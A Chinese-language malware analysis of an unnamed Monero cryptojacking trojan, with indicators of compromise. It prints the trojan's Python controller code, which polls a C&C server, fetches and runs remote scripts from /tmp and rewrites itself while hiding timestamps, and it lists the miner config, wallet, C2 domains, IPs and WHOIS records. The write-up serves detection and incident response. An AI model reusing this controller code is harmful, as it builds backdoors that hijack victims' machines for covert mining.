捕获一款无名挖矿木马(门罗币)样本分析

木马简介


背景


碰到一个挖矿木马,谷歌搜索没有找到相关的资料,暂时命名为无名矿马,挖矿程序是开源的XMRig(编译好后名字为update)。整个控制端依靠一个随机名python文件。
rc.local中有/etc/update

样本相关文件


一个随机名字的python文件和一个随机名字的python命令文件,用来执行自己的Python脚本程序。这个脚本会和C&C Server通信,来传输指令获取script,运行,开始挖矿。

Python脚本主要恶意功能


代码片段一:


if __name__ == "__main__":
    daemonize()  #标准守护进程代码,不赘述
    if not global_lock(VAR_LOCK):   #脚本单例运行文件排他锁,也没有啥可写的
        sys.exit(3)
    d = Schedule()  #  关键点,一个Schedule线程
    d.start()
    d.join()

代码片段二:


class Schedule(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
        self.inited = False
        self.time_alive = datetime.datetime.now()
        self.time_update = datetime.datetime.now()
        self.time_task = datetime.datetime.now()
        self.s = None
        self.sock_ref = 0
        self.list_records = []
        self.lock_records = thread.allocate_lock()
        self.select_host = ""
        self.select_port = ""

    def init(self):
        self.time_alive = datetime.datetime.now() + datetime.timedelta(minutes=1)
        # self.time_alive = datetime.datetime.now() + datetime.timedelta(seconds=3)
        self.time_task = datetime.datetime.now() + datetime.timedelta(minutes=1)
        self.time_update = datetime.datetime.now() + datetime.timedelta(minutes=10)
        self.inited = True
        pass

    def task_result(self, idx, result):
        data = {'msg': 'task', 'id': idx, 'result': base64.b64encode(result)}
        ops_send(self.s, data)
        self.socket_close()  # release sock

    def task_exec(self, task_id, script, sync, timeout=None):
        filename = gen_file_name()
        f = open(filename, 'w')
        f.write(script)
        f.write("\n")
        f.close()
        t = TaskExec(filename, sync, timeout, task_id)
        if sync:
            self.socket_connect()
            t.set_cb(self.task_result)
        t.run()
        time.sleep(0.5)
        try:
            os.unlink(filename)
        except:
            pass

    def socket_connect(self):
        if not self.s:
            self.s = sch_check_host()
            if not self.s:
                return None
        self.sock_ref += 1
        return self.s

    def socket_close(self):
        self.sock_ref -= 1
        if self.sock_ref == 0:
            self.s.close()
            self.s = None

    def alive(self):
        sock = self.socket_connect()
        if not sock:
            return
        data = {'msg': 'alive'}
        result = ops_send(sock, data)
        if not result:
            self.socket_close()
            return

        result, response = ops_recv(sock)
        if not result:
            self.socket_close()
            return
        self.socket_close()
        print response
        if type(response) is not dict:
            return
        if 'delay' in response.keys():
            self.time_alive = datetime.datetime.now() + datetime.timedelta(seconds=response['delay'])
        pass

    def update(self):
        sock = self.socket_connect()
        if not sock:
            return
        data = {'msg': 'update'}
        result = ops_send(sock, data)
        if not result:
            self.socket_close()
            return

        result, response = ops_recv(sock)
        if not result:
            self.socket_close()
            return
        self.socket_close()
        print response
        if type(response) is not dict:
            return
        if 'delay' in response.keys():
            self.time_update = datetime.datetime.now() + datetime.timedelta(seconds=response['delay'])
        if 'script' not in response.keys():
            return
        self_upgrade(response['script'])

    def task(self):
        sock = self.socket_connect()
        if not sock:
            return
        data = {'msg': 'task'}
        result = ops_send(sock, data)
        if not result:
            self.socket_close()
            return
        result, response = ops_recv(sock)
        if not result:
            self.socket_close()
            return
        self.socket_close()
        print response
        if type(response) is not dict:
            return

        if 'script' in response.keys():
            self.task_exec(response['id'], base64.b64decode(response['script']), response['sync'], response['timeout'])
        self.time_task = datetime.datetime.now() + datetime.timedelta(seconds=response['delay'])

    def run(self):
        while True:
            if not self.inited:
                self.init()
            cur_time = datetime.datetime.now()
            if cur_time > self.time_alive:
                try:
                    self.time_alive = datetime.datetime.now() + datetime.timedelta(seconds=60)
                    self.alive()
                except Exception, e:
                    pass
            if cur_time > self.time_update:
                try:
                    self.time_update = datetime.datetime.now() + datetime.timedelta(seconds=60)
                    self.update()
                except Exception, e:
                    pass
            if cur_time > self.time_task:
                try:
                    self.time_task = datetime.datetime.now() + datetime.timedelta(seconds=60)
                    self.task()
                except Exception, e:
                    pass
            # self.task_result()
            time.sleep(1)

可以看到一共执行三个有效通信函数:alive(),update(),task(),其中还涉及几个函数ops_send和ops_recv两个函数,都是socket通信,另外self_upgrade实现在我升级。self.task_exec()会下载矿马和配置文件运行开始挖矿。

def self_upgrade(script):
    self_file = os.path.abspath(__file__)
    ftime = (os.path.getctime(self_file), os.path.getmtime(self_file))
    f = open(self_file, 'w')
    f.write(script)
    f.close()
    os.utime(self_file, ftime)
    subprocess.Popen("sh -c \"chmod +x %s;kill -9 %d;%s\"" % (self_file, os.getpid(), self_file), shell=True)

生成文件


通过代码可以看到,会在/tmp下生成sess_后面跟随机字符窜的文件,用来存储C&C Server发来的Payload,但是也会看到很多这类文件大小为0,应该是C&C,不会每次都传过来吧。

VAR_LOC = "/tmp"
VAR_PFX = "sess_"
VAR_LOCK = '/tmp/.%s.lock' % VAR_SIGN

...

def gen_file_name(path=VAR_LOC, prefix=VAR_PFX, length=26):
    list_content = []
    name = ""
    charsets = [(97, 26), (48, 10)]
    for (start, count) in charsets:
        for i in range(0, count):
            list_content.append(chr(start + i))
    for i in range(0, length):
        name += str(list_content[random.randint(0, len(list_content) - 1)])
    index = random.randint(0, length - len(VAR_SIGN))
    # name[index:index+4] = "oops"
    name = name[:index] + VAR_SIGN + name[index + len(VAR_SIGN):]
    return os.path.join(path, prefix + name)

网络通信行为


根据脚本运行抓包来看



与代码中的网络通信行为保持一致。
从代码和网络通信行为的结果来看可以看出获得IOC:

挖矿的配置都在config.json中


{
    "algo": "cryptonight",  // cryptonight (default) or cryptonight-lite
    "av": 0,                // algorithm variation, 0 auto select
    "background": true,    // true to run the miner in the background
    "colors": false,         // false to disable colored output
    "cpu-affinity": null,   // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
    "cpu-priority": null,   // set process priority (0 idle, 2 normal to 5 highest)
    "donate-level": 1,      // donate level, mininum 1%
    "log-file": null,       // log all output to a file, example: "c:/some/path/xmrig.log"
    "max-cpu-usage": 80,    // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
    "print-time": 30,       // print hashrate report every N seconds
    "retries": 500,           // number of times to retry before switch to backup server
    "retry-pause": 5,       // time to pause between retries
    "safe": false,          // true to safe adjust threads and av settings for current CPU
    "threads": null,        // number of miner threads
    "pools": [
        {
            "url": "pool.minexmr.com:443", // URL of mining server
            "user": "44HEguZchqb3NEPePEuJicYWMwhQTFhGPDx6HroGHy5j8ycaWb6DL8YY2djPySmfzQLwAYfg7y12F3AqLeUhSB4VCpXnWvm.3673782466",           // username for mining server
            "pass": "x",                     // password for mining server
            "keepalive": true,               // send keepalived for prevent timeout (need pool support)
            "nicehash": false,               // enable nicehash/xmrig-proxy support
            "variant": -1                    // algorithm PoW variant
        }
    ],
    "api": {
        "port": 0,                             // port for the miner API https://github.com/xmrig/xmrig/wiki/API
        "access-token": null,                  // access token for API
        "worker-id": null                      // custom worker-id for API
    }
}


钱包:44HEguZchqb3NEPePEuJicYWMwhQTFhGPDx6HroGHy5j8ycaWb6DL8YY2djPySmfzQLwAYfg7y12F3AqLeUhSB4VCpXnWvm.3673782466
矿池:pool.minexmr.com:443

IOC


文件名


py文件,可以根据域名检索,因为其名字会变,文件第一行的 #!/sbin/regdbdump 是随机路径和名字 所以hash值不统一;
引导Python脚本的文件,随机名称,hash值见下;
config.json hash值见下
/tmp/.ops.lock

文件hash值


update
MD5: D8D311F7822DDAB5888A59313224E0A4
SHA1: 27752629A75588C029F1AF191AB40DC0ECAF9C64
随机文件名的python运行命令文件
MD5: 6078CE87E5E2A7448AC192E2AB1CA2DF
SHA1: 00E7805857F2C7A944B86CDF29C33D7022CDC7B8
config.json
MD5: 107E4289A3AA1E3F499E8629D2FB4612
SHA1: CB67E8E8C1A7660FF77F83E9B54679AEBC7C710B

IP地址


167.88.176.177
103.224.81.48
103.19.3.166
118.193.149.7

Domain域名


kernelpatch.info
rhelupdate.info

whois信息


kernelpatch.info

% IANA WHOIS server
% for more information on IANA, visit http://www.iana.org
% This query returned 1 object

refer:        whois.afilias.net

domain:       INFO

organisation: Afilias Limited
address:      Office 107
address:      3013 Lake Drive
address:      CityWest
address:      Dublin 24
address:      Ireland

contact:      administrative
name:         Ram Mohan
organisation: Afilias Limited
address:      C/O Afilias USA, Inc.
address:      300 Welsh Road, Building 3
address:      Suite 105
address:      Horsham Pennsylvania 19044
address:      United States
phone:        +1 215 706 5700
fax-no:       +1 215 706 5701
e-mail:       domainadmin@afilias.info

contact:      technical
name:         Howard Eland
organisation: Afilias Limited
address:      C/O Afilias USA, Inc.
address:      300 Welsh Road, Building 3
address:      Suite 105
address:      Horsham Pennsylvania 19044
address:      United States
phone:        +1 215 706 5700
fax-no:       +1 215 706 5701
e-mail:       domaintech@afilias.info

nserver:      A0.INFO.AFILIAS-NST.INFO 199.254.31.1 2001:500:19:0:0:0:0:1
nserver:      A2.INFO.AFILIAS-NST.INFO 199.249.113.1 2001:500:41:0:0:0:0:1
nserver:      B0.INFO.AFILIAS-NST.ORG 199.254.48.1 2001:500:1a:0:0:0:0:1
nserver:      B2.INFO.AFILIAS-NST.ORG 199.249.121.1 2001:500:49:0:0:0:0:1
nserver:      C0.INFO.AFILIAS-NST.INFO 199.254.49.1 2001:500:1b:0:0:0:0:1
nserver:      D0.INFO.AFILIAS-NST.ORG 199.254.50.1 2001:500:1c:0:0:0:0:1
ds-rdata:     8674 7 1 197789a2cbaba6fecd0b5ac88c5bc414ce1fc309
ds-rdata:     8674 7 2 ec9b6082b96b5f87143696f2b483acc9b2c433dce0c94e70f1ff5648ca18008b

whois:        whois.afilias.net

status:       ACTIVE
remarks:      Registration information: http://www.nic.info

created:      2001-06-26
changed:      2015-09-09
source:       IANA

Domain Name: KERNELPATCH.INFO
Registry Domain ID: D503300000103900891-LRMS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2018-05-31T02:26:13Z
Creation Date: 2018-05-31T02:26:13Z
Registry Expiry Date: 2019-05-31T02:26:13Z
Registrar Registration Expiration Date:
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Name Server: NS01.DOMAINCONTROL.COM
Name Server: NS02.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2018-07-03T11:51:08Z <<<

Domain Name: kernelpatch.info
Registry Domain ID: D503300000103900891-LRMS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2018-05-31T02:26:13Z
Creation Date: 2018-05-31T02:26:13Z
Registrar Registration Expiration Date: 2019-05-31T02:26:13Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR325615890
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 14455 N. Hayden Road
Registrant City: Scottsdale
Registrant State/Province: Arizona
Registrant Postal Code: 85260
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: kernelpatch.info@domainsbyproxy.com
Registry Admin ID: CR325615893
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 14455 N. Hayden Road
Admin City: Scottsdale
Admin State/Province: Arizona
Admin Postal Code: 85260
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: kernelpatch.info@domainsbyproxy.com
Registry Tech ID: CR325615892
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 14455 N. Hayden Road
Tech City: Scottsdale
Tech State/Province: Arizona
Tech Postal Code: 85260
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: kernelpatch.info@domainsbyproxy.com
Name Server: NS01.DOMAINCONTROL.COM
Name Server: NS02.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2018-07-03T11:00:00Z <<<

rhelupdate.info

% IANA WHOIS server
% for more information on IANA, visit http://www.iana.org
% This query returned 1 object

refer:        whois.afilias.net

domain:       INFO

organisation: Afilias Limited
address:      Office 107
address:      3013 Lake Drive
address:      CityWest
address:      Dublin 24
address:      Ireland

contact:      administrative
name:         Ram Mohan
organisation: Afilias Limited
address:      C/O Afilias USA, Inc.
address:      300 Welsh Road, Building 3
address:      Suite 105
address:      Horsham Pennsylvania 19044
address:      United States
phone:        +1 215 706 5700
fax-no:       +1 215 706 5701
e-mail:       domainadmin@afilias.info

contact:      technical
name:         Howard Eland
organisation: Afilias Limited
address:      C/O Afilias USA, Inc.
address:      300 Welsh Road, Building 3
address:      Suite 105
address:      Horsham Pennsylvania 19044
address:      United States
phone:        +1 215 706 5700
fax-no:       +1 215 706 5701
e-mail:       domaintech@afilias.info

nserver:      A0.INFO.AFILIAS-NST.INFO 199.254.31.1 2001:500:19:0:0:0:0:1
nserver:      A2.INFO.AFILIAS-NST.INFO 199.249.113.1 2001:500:41:0:0:0:0:1
nserver:      B0.INFO.AFILIAS-NST.ORG 199.254.48.1 2001:500:1a:0:0:0:0:1
nserver:      B2.INFO.AFILIAS-NST.ORG 199.249.121.1 2001:500:49:0:0:0:0:1
nserver:      C0.INFO.AFILIAS-NST.INFO 199.254.49.1 2001:500:1b:0:0:0:0:1
nserver:      D0.INFO.AFILIAS-NST.ORG 199.254.50.1 2001:500:1c:0:0:0:0:1
ds-rdata:     8674 7 1 197789a2cbaba6fecd0b5ac88c5bc414ce1fc309
ds-rdata:     8674 7 2 ec9b6082b96b5f87143696f2b483acc9b2c433dce0c94e70f1ff5648ca18008b

whois:        whois.afilias.net

status:       ACTIVE
remarks:      Registration information: http://www.nic.info

created:      2001-06-26
changed:      2015-09-09
source:       IANA

Domain Name: RHELUPDATE.INFO
Registry Domain ID: D503300000103900892-LRMS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2018-05-31T02:26:14Z
Creation Date: 2018-05-31T02:26:13Z
Registry Expiry Date: 2019-05-31T02:26:13Z
Registrar Registration Expiration Date:
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Name Server: NS01.DOMAINCONTROL.COM
Name Server: NS02.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2018-07-03T11:53:34Z <<<

Domain Name: rhelupdate.info
Registry Domain ID: D503300000103900892-LRMS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2018-05-31T02:26:14Z
Creation Date: 2018-05-31T02:26:13Z
Registrar Registration Expiration Date: 2019-05-31T02:26:13Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR325615889
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 14455 N. Hayden Road
Registrant City: Scottsdale
Registrant State/Province: Arizona
Registrant Postal Code: 85260
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: rhelupdate.info@domainsbyproxy.com
Registry Admin ID: CR325615894
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 14455 N. Hayden Road
Admin City: Scottsdale
Admin State/Province: Arizona
Admin Postal Code: 85260
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: rhelupdate.info@domainsbyproxy.com
Registry Tech ID: CR325615891
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 14455 N. Hayden Road
Tech City: Scottsdale
Tech State/Province: Arizona
Tech Postal Code: 85260
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: rhelupdate.info@domainsbyproxy.com
Name Server: NS01.DOMAINCONTROL.COM
Name Server: NS02.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2018-07-03T11:00:00Z <<<